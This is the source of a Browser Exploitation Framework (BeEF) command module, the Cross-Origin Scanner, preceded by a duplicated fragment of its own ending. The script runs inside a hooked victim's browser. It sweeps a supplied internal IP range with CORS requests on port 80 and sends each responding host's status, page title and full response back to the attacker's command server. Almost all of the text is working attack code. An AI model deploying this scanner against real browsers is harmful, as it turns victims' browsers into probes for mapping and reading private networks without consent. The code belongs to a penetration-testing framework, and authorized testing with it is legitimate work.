(.*?)<\\/title>"); if (title != null) title = title[1];' + 'beef.net.send("<%= @command_url %>", <%= @command_id %>, "ip='+ips[i]+'&port='+port+'&status="+response["status"]+"&title="+title+"&response="+JSON.stringify(response));' + '}' + '});' ); } });

// // Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var ips = new Array(); var ipRange = "<%= @ipRange %>"; var threads = "<%= @threads %>"; var wait = 2; if(!beef.browser.hasCors()) { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser does not support CORS'); return; } // set target IP range var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$'); if (range == null || range[1] == null) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied"); return; } // ipRange will be in the form of 192.168.0.1-192.168.0.254 // the fourth octet will be iterated. // (only C class IP ranges are supported atm) ipBounds = ipRange.split('-'); lowerBound = ipBounds[0].split('.')[3]; upperBound = ipBounds[1].split('.')[3]; for (var i = lowerBound; i <= upperBound; i++){ ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i; ips.push(ipToTest); } WorkerQueue = function(frequency) { var stack = []; var timer = null; var frequency = frequency; var start_scan = (new Date).getTime(); this.process = function() { var item = stack.shift(); eval(item); if (stack.length === 0) { clearInterval(timer); timer = null; var interval = (new Date).getTime() - start_scan; beef.debug("[Cross-Origin Scanner] Worker queue is complete ["+interval+" ms]"); return; } } this.queue = function(item) { stack.push(item); if (timer === null) { timer = setInterval(this.process, frequency); } } } beef.debug("[Cross-Origin Scanner] Starting CORS scan ("+ips.length+" URLs / "+threads+" workers)"); // create worker queue var workers = new Array(); for (w=0; w < threads; w++) { workers.push(new WorkerQueue(wait*1000)); } // send CORS request to each IP var proto = 'http'; var port = 80; for (var i=0; i < ips.length; i++) { var worker = workers[i % threads]; var url = proto + '://' + ips[i] + ':' + port; worker.queue('beef.net.cors.request(' + '"GET", "'+url+'", "", function(response) {' + 'if (response != null && response["status"] != 0) {' + 'beef.debug("[Cross-Origin Scanner] Received response from '+url+': " + JSON.stringify(response));' + 'var title = response["body"].match("(.*?)<\\/title>"); if (title != null) title = title[1];' + 'beef.net.send("<%= @command_url %>", <%= @command_id %>, "ip='+ips[i]+'&port='+port+'&status="+response["status"]+"&title="+title+"&response="+JSON.stringify(response));' + '}' + '});' ); } });